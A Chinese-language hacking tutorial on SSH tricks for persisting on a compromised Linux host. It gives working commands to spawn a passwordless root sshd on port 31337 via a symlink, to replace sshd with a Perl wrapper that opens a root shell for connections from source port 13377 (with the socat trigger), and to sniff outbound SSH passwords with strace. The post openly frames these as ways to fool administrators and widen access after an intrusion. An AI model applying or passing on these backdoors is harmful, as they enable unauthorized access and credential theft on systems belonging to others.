087-渗透技巧之SSH篇

# 渗透技巧之SSH篇

用些小技巧,蒙蒙菜鸟管理员。

### 1. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口

肉鸡上执行

“`
mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;

“`

就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。

效果图:

![enter image description here](http://drops.javaweb.org/uploads/images/2e30d14a59ea7777cda947d115173921cc016286.jpg)

### 2. 做一个SSH wrapper后门,效果比第一个好,没有开放额外的端口,只要对方开了SSH服务,就能远程连接

在肉鸡上执行:

“`
[root@localhost ~]# cd /usr/sbin
[root@localhost sbin]# mv sshd ../bin
[root@localhost sbin]# echo ‘#!/usr/bin/perl’ >sshd
[root@localhost sbin]# echo ‘exec “/bin/sh” if (getpeername(STDIN) =~ /^..4A/);’ >>sshd
[root@localhost sbin]# echo ‘exec {“/usr/bin/sshd”} “/usr/sbin/sshd”,@ARGV,’ >>sshd
[root@localhost sbin]# chmod u+x sshd
[root@localhost sbin]# /etc/init.d/sshd restart

“`

在本机执行:

“`
socat STDIO TCP4:10.18.180.20:22,sourceport=13377

“`

如果你想修改源端口,可以用python的struct标准库实现

“`
>>> import struct
>>> buffer = struct.pack(‘>I6’,19526)
>>> print repr(buffer)
‘\x00\x00LF’
>>> buffer = struct.pack(‘>I6’,13377)
>>> print buffer
4A

“`

效果图如下:

![enter image description here](http://static.wooyun.org/20140918/2014091812470923422.png)

### 3. 记录SSH客户端连接密码

搞定主机后,往往想记录肉鸡SSH连接到其他主机的密码,进一步扩大战果,使用strace命令就行了。

效果图:

![enter image description here](http://drops.javaweb.org/uploads/images/bbceff9ee795e8fcc01f6383eed5f1a80ab84182.jpg)

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容